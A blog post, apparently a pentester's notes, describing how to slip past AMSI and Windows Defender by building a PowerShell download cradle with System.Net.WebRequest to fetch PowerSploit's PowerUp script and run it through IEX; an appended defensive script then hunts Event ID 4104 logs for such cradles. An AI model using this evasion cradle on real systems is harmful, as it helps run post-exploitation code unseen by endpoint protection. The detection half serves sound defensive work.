How to Bypass AMSI with an Unconventional PowerShell Cradle
I am writing this article to keep my notes while learning new ways of using PowerShell for pentesting and red teaming.
This post is about bypassing Microsoft Windows Defender and AMSI to download and execute the cradle for malicious PowerShell scripts ;). I will try to make this post as precise as I can.
While working on my educational research project, I have been trying to find new ways to bypass AMSI in order to execute PowerShell scripts and commands that are considered malicious and flagged by Microsoft Windows Defender.
Just to note, protection definitions are up to date:
I was trying to run the PrivEsc enumeration script "PowerUp":
PowerSploit - A PowerShell Post-Exploitation Framework (PowerShellMafia/PowerSploit, github.com)
But as expected, AMSI was already awake :P and it blocked me from running the cradle:
I thought I would try some .NET class other than Net.WebClient. I am not good at programming, so I googled and found the System.Net.WebRequest class:
"The .NET Framework provides protocol-specific classes derived from the WebRequest and WebResponse classes for URIs that…" (docs.microsoft.com)
After playing around for a while, I came up with the script below:
$webreq = [System.Net.WebRequest]::Create('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
After setting everything up, it's as simple as IEX :P
Thanks :) Maybe I will come up with a shorter version of this.
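From the defender's side, the interesting point is that swapping Net.WebClient for System.Net.WebRequest only changes the string that AMSI sees in the cradle itself; once Script Block Logging is enabled, the full text of every script block (including the downloaded content that IEX runs) is written to the Microsoft-Windows-PowerShell/Operational log as Event ID 4104. The following PowerShell is an added example, not code from the original post: it checks whether Script Block Logging is switched on via policy and then scores recent 4104 events against a small set of download-cradle indicators. The indicator patterns, the two-hit threshold and the one-day lookback are assumptions for illustration and should be tuned against a baseline of legitimate scripts in your environment.

```powershell
# Added defensive example (not from the original post): audit Script Block Logging
# and hunt the PowerShell operational log for download-cradle patterns such as the
# WebRequest + IEX combination described above.

# 1. Check whether Script Block Logging (Event ID 4104) is enabled via policy.
$sblPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
$sbl = Get-ItemProperty -Path $sblPath -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
if (-not $sbl -or $sbl.EnableScriptBlockLogging -ne 1) {
    Write-Warning 'Script Block Logging is not enabled; 4104 events will not capture cradle content.'
}

# 2. Indicators of a download-and-execute cradle. These are illustrative assumptions;
#    tune them against your own baseline of legitimate automation.
$patterns = @(
    'System\.Net\.WebRequest',
    'Net\.WebClient',
    'Invoke-Expression|\bIEX\b',
    'raw\.githubusercontent\.com'
)

# 3. Pull recent 4104 events (assumed one-day lookback) and score each script block
#    by how many indicators it matches. Two or more hits is the assumed alert threshold.
$since  = (Get-Date).AddDays(-1)
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $since
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # In a 4104 event the properties are MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
    $text = [string]$e.Properties[2].Value
    $hits = @($patterns | Where-Object { $text -match $_ })
    if ($hits.Count -ge 2) {
        [PSCustomObject]@{
            Time    = $e.TimeCreated
            Score   = $hits.Count
            Matched = ($hits -join ', ')
            Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
        }
    }
}
```

Run it in an elevated session (reading the operational log and the policy key both need it) and pipe the output to Format-Table or Export-Csv. Because 4104 records the script block after any string concatenation or obfuscation has been resolved by the parser, matching on the decoded text catches variants that rename the .NET class or split the IEX token, which a signature on the raw cradle string would miss.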